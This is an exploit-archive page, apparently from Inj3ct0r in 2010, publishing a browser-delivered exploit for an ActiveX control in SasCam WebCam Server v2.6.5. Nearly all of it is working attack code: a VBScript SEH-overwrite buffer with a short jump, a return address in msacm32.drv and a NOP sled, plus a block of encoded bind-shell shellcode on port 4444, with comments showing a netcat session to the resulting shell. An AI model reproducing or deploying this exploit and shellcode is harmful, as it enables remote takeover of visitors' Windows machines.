SasCam WebCam Server v2.6.5 ActiveX SEH Overwrite

Posted on 03 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>SasCam WebCam Server v2.6.5 ActiveX SEH Overwrite</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================
SasCam WebCam Server v2.6.5 ActiveX SEH Overwrite
=================================================


&lt;html&gt;
&lt;object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3'
id='target'&gt;&lt;/object&gt;
&lt;script language = 'vbscript'&gt;
 
'SEH Overwrite exploited by Blake
'Original EIP method by callAX
'Tested on XP SP3/IE7 in virtualbox
'$ nc 192.168.1.155 4444
'Microsoft Windows XP [Version 5.1.2600]
'(C) Copyright 1985-2001 Microsoft Corp.
'
'C:Documents and SettingslakeDesktop&gt;
 
 
buffer = String(8349, &quot;A&quot;)
nseh = unescape(&quot;%eb%06%90%90&quot;)            ' short jump
seh = unescape(&quot;%4E%20%D1%72&quot;)             ' 0x72D1204E [msacm32.drv]
nops = String(20, unescape(&quot;%90&quot;))               ' nop sled
junk = String(2000, &quot;C&quot;)
 
&lt;!-- bind shell port 4444 - around 1980 bytes of space for shellcode --&gt;
 
sc =  unescape(&quot;%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49&quot;) &amp; _
               unescape(&quot;%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36&quot;)
&amp; _
               unescape(&quot;%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34&quot;)
&amp; _
               unescape(&quot;%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41&quot;)
&amp; _
               unescape(&quot;%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e&quot;)
&amp; _
               unescape(&quot;%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48&quot;)
&amp; _
               unescape(&quot;%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37&quot;)
&amp; _
               unescape(&quot;%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58&quot;)
&amp; _
               unescape(&quot;%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48&quot;)
&amp; _
               unescape(&quot;%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c&quot;)
&amp; _
               unescape(&quot;%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e&quot;)
&amp; _
               unescape(&quot;%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58&quot;)
&amp; _
               unescape(&quot;%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44&quot;)
&amp; _
               unescape(&quot;%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48&quot;)
&amp; _
               unescape(&quot;%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d&quot;)
&amp; _
               unescape(&quot;%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58&quot;)
&amp; _
               unescape(&quot;%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56&quot;)
&amp; _
               unescape(&quot;%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46&quot;)
&amp; _
               unescape(&quot;%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37&quot;)
&amp; _
               unescape(&quot;%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e&quot;)
&amp; _
               unescape(&quot;%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e&quot;)
&amp; _
               unescape(&quot;%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50&quot;)
&amp; _
               unescape(&quot;%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55&quot;)
&amp; _
               unescape(&quot;%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54&quot;)
&amp; _
               unescape(&quot;%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41&quot;)
&amp; _
               unescape(&quot;%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a&quot;)
&amp; _
               unescape(&quot;%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41&quot;)
&amp; _
               unescape(&quot;%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32&quot;)
&amp; _
               unescape(&quot;%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d&quot;)
&amp; _
               unescape(&quot;%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d&quot;)
&amp; _
               unescape(&quot;%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46&quot;)
&amp; _
               unescape(&quot;%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45&quot;)
&amp; _
               unescape(&quot;%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46&quot;)
&amp; _
               unescape(&quot;%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c&quot;)
&amp; _
               unescape(&quot;%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c&quot;)
&amp; _
               unescape(&quot;%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32&quot;)
&amp; _
               unescape(&quot;%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46&quot;)
&amp; _
               unescape(&quot;%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f&quot;)
&amp; _
               unescape(&quot;%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56&quot;)
&amp; _
               unescape(&quot;%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46&quot;)
&amp; _
               unescape(&quot;%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36&quot;)
&amp; _
               unescape(&quot;%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f&quot;)
&amp; _
               unescape(&quot;%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d&quot;)
&amp; _
               unescape(&quot;%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d&quot;)
&amp; _
               unescape(&quot;%4f%4f%42%4d%5a&quot;)
 
exploit = buffer + nseh + seh + nops + sc + junk
target.Get exploit
 
&lt;/script&gt;
&lt;html&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20